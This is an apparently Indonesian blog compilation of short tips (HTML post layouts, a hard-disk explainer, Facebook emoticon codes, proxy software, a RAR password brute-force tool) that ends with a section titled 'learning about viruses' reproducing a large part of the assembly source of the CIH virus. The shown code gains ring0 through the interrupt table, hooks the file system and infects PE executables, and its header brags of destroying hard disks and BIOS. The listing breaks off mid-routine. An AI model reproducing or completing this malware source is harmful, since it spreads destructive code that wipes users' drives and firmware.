Membuat Posting Bergaya Koran

Postingan Gaya Koran, Cara membuat postingan menjadi dua baris seperti di bawah ini. Gimana buat postingan gaya koran? Udah lihat aja caranya di bawah !

Scriptnya:

    <table cellpadding="10" cellspacing="10"><tbody>
    <tr>
    <td align="justify" valign="top" width="300">artikel di bagian kiri</td>
    <td align="justify" valign="top" width="300">artikel di bagian kanan</td>
    </tr>
    </tbody></table>  

Silahkan cermati script tadi, sesuaikan dengan ukuran width masing masing main blog, oke langsung praktek, saat pengeposan pilih mode Edit HTML bukan Compose, Contohnya akan seperti ini :

silahkan dicoba, klo gak dicoba gak belajar dong namanya, hehehe, sekianlah cara buat postingan gaya koran.

Dengan menulis seperti ini dapat menghilangkan kebosanan saat ngeposting ya gak dengan, membuat postingan gaya koran tentunya akan telihat lebih menarik suatu postingan, dengan begitu niat untuk ngeposing ada aja, hahaha ... kira kira seperti ini cintonhnya .

Nah, sudah bisakan buat postingan gaya koran, untuk tambkan berapa kolom yang kita mau silahkan cermati script tadi, antara kode

dan

Oke itulah triks cara buat postingan gaya koran, Semoga bermanfaat dan lebih semangat ngeposting artikel yang akan di Share untuk kita-kita

Pengartian dan Fungsi Harddisk

FUNGSI HARDDISK

• Harddisk merupakan ruang simpan utama dalam sebuah computer. Di situlah seluruh sistem operasi dan mekanisme kerja kantor dijalankan, setiap data dan informasi disimpan.

•  Dalam sebongkah harddisk, terdapat berbagai macam ruangruang kecil (direktori, folder, subdirektori, subfolder), yang masing-masing dikelompokkan berdasarkan fungsi dan kegunaannya. Di situlah data-data diletakkan.
• Ruang kecil dalam harddisk bekerja dalam logika saling tergantung (interdependent). Data/informasi dalam satu ruang kadangkala diperlukan untuk menggerakkan data/ informasi yang berada di ruang lain. Ada ruang di mana data di dalamnya tidak boleh diutak-atik atau dipindahkan ke tempat lain, ada ruang di mana kita bisa membuang dan menaruh data secara bergantian sesuai kebutuhan.
• Harddisk terdiri atas beberapa komponen penting. Komponen utamanya adalah pelat (platter) yang berfungsi sebagai penyimpan data. Pelat ini adalah suatu cakram padat yang berbentuk bulat datar, kedua sisi permukaannya dilapisi dengan material khusus sehingga memiliki pola-pola magnetis. Pelat ini ditempatkan dalam suatu poros yang disebut spindle.

PRINSIP KERJA HARDDISK

• Spindle memiliki sebuah penggerak yang disebut spindle motor, yang berfungsi untuk memutar pelat harddisk dalam kecepatan tinggi. Perputaran ini diukur dalam satuan rotation per minute (RPM). Makin cepat putaran tiap menitnya, makin bagus kualitas harddisk tersebut. Ukuran yang lazim kita dengar adalah 5400, 7200, atau 10.000RPM.

• Sebuah peranti baca-tulis elektromagnetik yang disebut dengan heads ditempatkan pada kedua permukaan pelat. Heads berukuran kecil ini ditempatkan pada sebuah slider, sehingga heads bisa membaca data/informasi yang tersimpan pada pelat dan merekam informasi ke dalam pelat tersebut.
• Slider ini dihubungkan dengan sebuah lengan yang disebut actuator arms. Actuator arms ini sendiri dipasang mati pada poros actuator, di mana seluruh mekanisme gerakan dari actuator ini dikendalikan oleh sebuah papan pengendali (logic board) yang mengomunikasikan setiap pertukaran informasi dengan komponen komputer yang lainnya. Antara actuator dengan karena keduanya dihubungkan dengan sebuah kabel pita tipis. Kabel inilah yang menjadi jalan instruksi dari dan ke dalam pelat harddisk.
• Jumlah pelat masing-masing harddisk berbeda-beda, tergantung dari ukuran/daya tampung masing-masing pelat dan ukuran harddisk secara keseluruhan.
• Sebuah pelat harddisk pada umumnya memiliki daya tampung antara 10 atau 20gigabyte (GB). Sebuah harddisk yang berkapasitas total 40GB berarti memiliki 2 pelat, sedangkan bila berukuran 30GB, ia memiliki dua buah pelat berukuran 10 dan 20GB atau tiga buah pelat berukuran 10GB. Masing-masing pelat harddisk mampu menangani/menampung puluhan juta bit data. Data-data ini dikelompokkan ke dalam kelompok-kelompok yang lebih besar, sehingga memungkinkan pengaksesan informasi yang lebih cepat dan mudah.
• Masing-masing pelat memiliki dua buah head, satu berada di atas permukaan pelat, satunya lagi ada di bawah head. Dari sini ketahuan bahwa harddisk yang memiliki tiga buah pelat misalnya (rata-rata sebuah harddisk memang terdiri atas tiga pelat) memiliki total enam permukaan dan enam head.
• Masing-masing pelat memiliki kemampuan merekam dan menyimpan informasi dalam suatu lingkaran konsentris yang disebut track (bayangkan track ini seperti lintasan dalam suatu arena perlombaan atletik).
• Masing-masing track terbagi lagi dalam bagian-bagian yang lebih kecil yang disebut sektor (sector). Nah, setiap sektor dalam tracktrack harddisk ini mampu menampung informasi sebesar 512 bytes.
• Sektor-sektor dalam sebuah harddisk ini tidak dikelompokkan secara mandiri tetapi dikelompokkan lagi dalam sebuah gugusan yang lebih besar yang disebut cluster. Apa fungsi peng-cluster-an ini? Tak lain adalah untuk membuat mekanisme penulisan dan penyimpanan data menjadi lebih sederhana, lebih efisien, tidak berisiko salah, dan dengan demikian memperpanjang umur harddisk.
• Sekarang kita ambil contoh ketika kita tengah menjalankan sebuah program spreadsheet pada komputer kita. Ketika kita memasukkan data ke dalam program spreadsheet, di sana terjadi ribuan atau bahkan jutaan pengaksesan disk secara individual. Dengan demikian, memasukkan data berukuran 20megabyte (MB) ke dalam sektor-sektor berukuran 512 byte jelas akan memakan waktu dan menjadi tidak efisien.
• Untuk mengefisienkan pekerjaan, inilah yang dilakukan berbagai komponen dalam PC secara bahu-membahu.

Animation For Chat Facebook

       We have already posted 2012 smileys code for Facebook  So these are animated that’s why you will love them sharing with all your friends. So in the right image I just shared these animated emoticons with my friend  I think he loved these codes and I loved sharing with all of you.

                                         

Animated Emoticons Codes for Facebook Chat :

=================================

Coppy this code and paste to your chat facebook

[[126236287388324]] – Love Code

[[126125527399400]] – Muaaach Kissing :*

[[126134560731830]] – Hoam Ngantuk Rek

[[126261164052503]] – Hula Hula

[[126221767389776]] – Spin Heart

[[126214010723885]] – Stroke

[[126386227373330]] – Oversleep Insomnia

[[389448181885]]    – Week

[[126539730695178]] – Love Shame

[[126540207361797]] – Love Smail

[[126232017388751]] – Broken heart

[[126229700722316]] – Pikachu

[[126392380706048]] – ready sleep

[[126276450717641]] – blast love ..tiupan cinta

[[126391564039463]] – Stress

[[110566632320002]] – Cat listening to music

[[126230590722227]] – Super Mario

[[126213110723975]] – Hello Ketty

[[126227960722490]] – kiss

[[126230880722198]] – Green Worm Ani

[[126229327389020]] – Rose Red Ani

[[127868980561350]] – Heart beat

[[126220920723194]] – Santa

[[126216480723638]] – butterfly blue

[[126132024065417]] – Heart rotate ani

[[126278187384134]] – O Yeah Hippo

[126217194056900]]  – i ♥ u

[[389449726885]]    – i love you

[[126540207361797]] – Smileys Inlove

[[398699314236]]    – Teddy n ♥

[[110780922298250]] – Heart on Fire

[[127878643893717]] – hand Clap

[[398570519236]]    – mickey at Sleep

[[394930959230]]    – Smileys Zzzz

[[126398717372810]] – Converse

[[110563818986950]] – Wew

[[110566395653359]] – cat licking screen

Cara merubah tampilan Background Postingan Pada Blog

Untuk para bloger yang sering membuat postingan akan tetapi bosan karena postingan blog nya berbackground monotone atau membosankan maka cara ini dapat digunakan untuk membuat travick blog anda meningkat. Caranya adalah yaitu menggunakan perintah di bawah ini silahkan kalian copy dan paste bahan-bahan berikut ini .

<div style="background: url(http://i1002.photobucket.com/albums/af149/Imtikhan/background_posting.jpg
) no-repeat;
color:#000;
padding:10px 10px 10px 10px;
-moz-border-radius-topright:10px;
-webkit-border-top-right-radius:10px;
-moz-border-radius-bottomright:10px;
-webkit-border-bottom-right-radius:10px;
-moz-border-radius-topleft:10px;
-webkit-border-top-left-radius:10px;
-moz-border-radius-bottomleft:10px;
-webkit-border-bottom-left-radius:10px;">

Isi Postingan

</div>

Cara nya adalah pada kotak post / tempat biasa kalian membuat artikel,postingan atau yang lainnya klik pada bagian Edit HTML  kemudian masukkan bahan atau script di atas.
kemudian pada bagian Isi Posting kalian masukan postingan atau artikel kalian pada daerah tersebut
dan pada bagian http://i1002.photobucket.com/albums/af149/Imtikhan/background_posting.jpg dapat kalian ubah sesuai dengan gambar bacground yang anda inginkan.

Cara mengganti IP dengan IP Luar Negeri

Pernah dengar proxy? Ya, sebagian besar pemain Internet sudah tau itu. Kalau belum tau, kemungkinan besar anda adalah newbie. Tapi ga apa. Di dunia virtual disediakan berbagai situs proxy, ada hidemyass, ninjaproxy, shadowbrowser.

Tujuan memakai proxi adalah untuk menutupi jejak IP sebenarnya dengan menebeng IP dari negara asing. Selain pake alamat proxy, kita bisa juga pake VPN, tidak perlu panjang2 saya jabarkan, tapi kali ini saya kenalin sebuah software yang tidak jauh berbeda penggunaannya.

Software ini bernama Invisible Browsing. Bisa dipakai untuk ubah alamat IP dengan menghilangkan alamat IP yang sebenarnya. Software keren ini punya kemampuan menghapus berbagai jejak browsing seperti typed URL, username dan password, history browsing, autocomplete forms, dll. Memiliki fitur yang mengamankan kita saat berkelana di dunia Internet juga dalam memblocking script berbahaya seperti ActiveX dan PopUp Windows.

Pokoknya aman deh pakai perangkat ini untuk surfing karena privasi pribadi kita yang penting terjaga.

Download di sini

source : http://dika.id-fb.com

Cara membuat Pelaku copy paste menyertakan link Sumber Penulis

Masih di Ber-Bagians share Cara Agar Pelaku Copy Paste Menyertakan Sumber Penulis cekidot

Silahkan sobat kunjungi situsnya https://id.tynt.com/ kemudian silahkan sobat daftar sign up dengan mengisi semua data - data seperti gambar di bawah ini

Untuk pengisian data Domain contoh dika.id-fb.com/ , kemudian centang I agree to the Usage and Privacy Agreements jangan lupa klik Submit--> kemudian sobat akan di arahkan seperti gambar di bawah ini

Silahkan sobat edit tampilan nya sesusai keinginan sobat dengan mengklik Customize Address Bar Tracking dan Customize Attribution jika sudah silahkan klik save kemudian klik Next -->> sobat akan diarahkan seperti gambar di bawah ini

Silahkan sobat Copy Paste Script yang telah diberikan oleh https://id.tynt.com/ ke blog sobat dan simpan sebelum kode script </head>

dengan cara silahkan log in terlebih dahulu di blogs sobat >> klik rancangan >> klik edit html >> centang Expand Template Widget , tekan Ctrl + F kemudian paste </head> jika sudah ketemu silahkan paste script yang telah diberikan oleh https://id.tynt.com/ tersebut simpan template , kemudian kembali lagi ke situs https://id.tynt.com/ , sobat akan di arahkan seperti gambar di bawah ini

Silahkan sobat klik Test My Script untuk membaca semua isi posting blog sobat jika berhasil dalam menyimpan kode script tersebut , sobat akan diarahkan seperti gambar di bawah ini

Kemudian silahkan klik Next--> sobat akan di arahkan seperti gambar di bawah ini

Silahkan klik Finish , selesai Semoga Bermanfaat
Sumber: http://dika.id-fb.com

Cara membuka File RAR yang Terkunci

RAR Password Unlocker adalah sebuah software gratis yang fungsinya membuka file RARyang terkunci. Software ini menggunakan brute force password recovery yang dapat membantu anda memulihkan file RAR yang terkunci dan yang tidak mudah membukanya.

RAR Password Unlocker dapat bekerja pada berbagai sistem operasi mulai dari Windows98, Windows xp, Windows 7 dan lain-lain. Kapasitas software ini 588 KB, sangat kecil dan mudah diinstal. Silahkan didownload.

Download Via Ziddu

Cara menggunakan :

Buka RAR Password Unlocker dan instal seperti biasanya, setelah itu maka program tersebut akan terbuka. Klik select untuk mencari file RAR yang anda inginkan tentunya file tersebut terkunci, kemudian klik select yang terdapat di bawahnya lagi untuk mencari tempat dimana Password akan tersimpan, Password yang tersimpan berupa Notepad.

Harus diingat bahwa RAR Password Unlocker hanya dapat digunakan di file berupa type RAR

Belajar Tentang Virus

PHP Code:

****************************************************************************

; * The Virus Program Information *
;
****************************************************************************

; *
*
; * Designer : CIH Original Place : TTIT of Taiwan *
; * Create Date : 04/26/1998 Now Version : 1.2 *
; * Modification Time : 05/21/1998
*
; * *
;
*==========================================================================*

; * Modification History *
;
*==========================================================================*

; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System.
*
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected.
*
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
;
*==========================================================================*

; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
;
*==========================================================================*

; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
;
****************************************************************************


.586P
;
****************************************************************************

; * Original PE Executable File(Don't Modify this Section)
*
;
****************************************************************************


OriginalAppEXE SEGMENT

FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize

OriginalAppEXE ENDS

;
****************************************************************************

; * My Virus Game
*
;
****************************************************************************


; *********************************************************
; * Constant Define *
; *********************************************************

TRUE = 1
FALSE = 0
DEBUG = TRUE
MajorVirusVersion = 1
MinorVirusVersion = 2
VirusVersion = MajorVirusVersion*10h+MinorVirusVersion

IF DEBUG
FirstKillHardDiskNumber = 81h
HookExceptionNumber = 05h
ELSE
FirstKillHardDiskNumber = 80h
HookExceptionNumber = 03h
ENDIF

FileNameBufferSize = 7fh
; *********************************************************
VirusGame SEGMENT
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
; *********************************************************
; * Ring3 Virus Game Initial Program *
; *********************************************************
MyVirusStart:
push ebp
; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************
lea eax, [esp-04h*2]
xor ebx, ebx
xchg eax, fs:[ebx]
call @0@0:
pop ebx
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF = 0
cli
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-@1[ecx]
push esi
mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber ; GenerateException
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
push esi
mov esi, eax
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]
rep movsb
sub eax, 08h
mov esi, [eax]
or esi, esi
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
jmp LoopOfMergeAllVirusCodeSection
QuitLoopOfMergeAllVirusCodeSection:
pop esi
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateException Again
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************ReadyRestoreSE:
sti
xor ebx, ebx
jmp RestoreSE; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]RestoreSE:
pop dword ptr fs:[ebx]
pop eax; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
ret ; Return to Original App Entry Point; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException; *************************************
; * Return to Ring3 Initial Program *
; *************************************ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;
iretd; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************AllocateSystemMemoryPage:
mov dr0, ebx ; Set the Mark of My Virus Exist in System
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocate
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, and flags
add esp, 08h*04h
xchg edi, eax ; EDI = SystemMemory Start Address
lea eax, MyVirusStart-@2[esi]
iretd ; Return to Ring3 Initial Program; *************************************
; * Install My File System Api Hook *
; *************************************InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-@6[edi]
push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, and flags
mov dr0, eax ; Save OldFileSystemApiHook Address
pop eax ; EAX = FileSystemApiHook Address

; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], edx

; Modify IFSMgr_InstallFileSystemApiHook Entry Point
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax

cli
jmp ExitRing0Init; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************CodeSizeOfMergeVirusCodeSection = offset $
; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; *********************************************************InstallFileSystemApiHook:
push ebx
call @4 ;
@4: ;
pop ebx ; mov ebx, offset FileSystemApiHook
add ebx, FileSystemApiHook-@4 ;
push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, and flags
pop eax

; Call Original IFSMgr_InstallFileSystemApiHook
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
push eax

; Call Original IFSMgr_InstallFileSystemApiHook
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
mov dr0, eax ; Adjust OldFileSystemApiHook Address
pop eax
pop ebx
ret; *********************************************************
; * Static Data *
; *********************************************************OldInstallFileSystemApiHook dd ?
; *********************************************************
; * IFSMgr_FileSystemHook *
; *********************************************************

; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; *************************************FileSystemApiHook:
@3 = FileSystemApiHook
pushad
call @5 ;
@5: ;
pop esi ; mov esi, offset
VirusGameDataStartAddress
add esi, VirusGameDataStartAddress-@5; *************************************
; * Is OnBusy !? *
; *************************************
test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
jnz pIFSFunc ; goto pIFSFunc; *************************************
; * Is OpenFile !? *
; *************************************
; if ( NotOpenFile )
; goto prevhook
lea ebx, [esp+20h+04h+04h]
cmp dword ptr [ebx], 00000024h
jne prevhook; *************************************
; * Enable OnBusy *
; *************************************
inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; *************************************
; mov esi, offset FileNameBuffer
add esi, FileNameBuffer-@6
push esi
mov al, [ebx+04h]
cmp al, 0ffh
je CallUniToBCSPath
add al, 40h
mov ah, ':'
mov [esi], eax
inc esi
inc esi
; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname *
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; *************************************
CallUniToBCSPath:
push 00000000h
push FileNameBufferSize
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
add eax, 04h
push eax
push esi
int 20h ; VXDCall UniToBCSPath
UniToBCSPath = $
dd 00400041h
add esp, 04h*04h
; *************************************
; * Is FileName '.EXE' !? *
; *************************************
; cmp [esi+eax-04h], '.EXE'
cmp [esi+eax-04h], 'EXE.'
pop esi
jne DisableOnBusy
IF DEBUG
; *************************************
; * Only for Debug *
; *************************************
; cmp [esi+eax-06h], 'FUCK'
cmp [esi+eax-06h], 'KCUF'
jne DisableOnBusy
ENDIF
; *************************************
; * Is Open Existing File !? *
; *************************************
; if ( NotOpenExistingFile )
; goto DisableOnBusy
cmp word ptr [ebx+18h], 01h
jne DisableOnBusy
; *************************************
; * Get Attributes of the File *
; *************************************
mov ax, 4300h
int 20h ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO = $
dd 00400032h
jc DisableOnBusy
push ecx
; *************************************
; * Get IFSMgr_Ring0_FileIO Address *
; *************************************
mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
mov edi, [edi]
; *************************************
; * Is Read-Only File !? *
; *************************************
test cl, 01h
jz OpenFile
; *************************************
; * Modify Read-Only File to Write *
; *************************************
mov ax, 4301h
xor ecx, ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Open File *
; *************************************
OpenFile:
xor eax, eax
mov ah, 0d5h
xor ecx, ecx
xor edx, edx
inc edx
mov ebx, edx
inc ebx
call edi ; VXDCall IFSMgr_Ring0_FileIO
xchg ebx, eax ; mov ebx, FileHandle
; *************************************
; * Need to Restore *
; * Attributes of the File !? *
; *************************************
pop ecx
pushf
test cl, 01h
jz IsOpenFileOK
; *************************************
; * Restore Attributes of the File *
; *************************************
mov ax, 4301h
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Is Open File OK !? *
; *************************************
IsOpenFileOK:
popf
jc DisableOnBusy
; *************************************
; * Open File Already Succeed. ^__^ *
; *************************************
push esi ; Push FileNameBuffer Address to Stack
pushf ; Now CF = 0, Push Flag to Stack
add esi, DataBuffer-@7 ; mov esi, offset DataBuffer
; ***************************
; * Get OffsetToNewHeader *
; ***************************
xor eax, eax
mov ah, 0d6h

; For Doing Minimal VirusCode's Length,
; I Save EAX to EBP.
mov ebp, eax
xor ecx, ecx
mov cl, 04h
xor edx, edx
mov dl, 3ch
call edi ; VXDCall IFSMgr_Ring0_FileIO
mov edx, [esi]
; ***************************
; * Get 'PE\0' Signature *
; * of ImageFileHeader, and *
; * Infected Mark. *
; ***************************
dec edx
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; cmp [esi], '\0PE\0'
cmp dword ptr [esi], 00455000h
jne CloseFile; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; *************************************

; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE00' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> @8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; *************************************
push ebx ; Save File Handle
push 00h ; Set VirusCodeSectionTableEndMark; ***************************
; * Let's Set the *
; * Virus' Infected Mark *
; ***************************
push 01h ; Size
push edx ; Pointer of File
push edi ; Address of Buffer; ***************************
; * Save ESP Register *
; ***************************
mov dr1, esp; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; ***************************
push eax ; Size
; ***************************
; * Let's Read *
; * Image Header in File *
; ***************************
mov eax, ebp
mov cl, SizeOfImageHeaderToRead
add edx, 07h ; Move EDX to NumberOfSections
call edi ; VXDCall IFSMgr_Ring0_FileIO; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; ***************************
lea eax, (AddressOfEntryPoint-@8)[edx]
push eax ; Pointer of File
lea eax, (NewAddressOfEntryPoint-@8)[esi]
push eax ; Address of Buffer
; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; ***************************
movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
lea edx, [eax+edx+12h]
; ***************************
; * Let's Get *
; * Total Size of Sections *
; ***************************
mov al, SizeOfScetionTable
; I Assume NumberOfSections <= 0ffh
mov cl, (NumberOfSections-@8)[esi]
mul cl; ***************************
; * Let's Set Section Table *
; ***************************
; Move ESI to the Start of SectionTable
